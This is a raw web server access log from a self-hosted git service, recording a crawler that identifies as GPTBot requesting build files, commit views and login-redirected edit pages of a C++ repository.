"/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11360] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9908] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 1067] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10134] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:19:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11350] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 18157] [Gzip 11.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 999] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 1489] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:19:09:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:19:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:19:09:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:19:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:19:09:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:19:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:19:09:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:19:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:19:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11283] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:19:09:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:19:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:19:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 12161] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 969] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:19:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:19:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 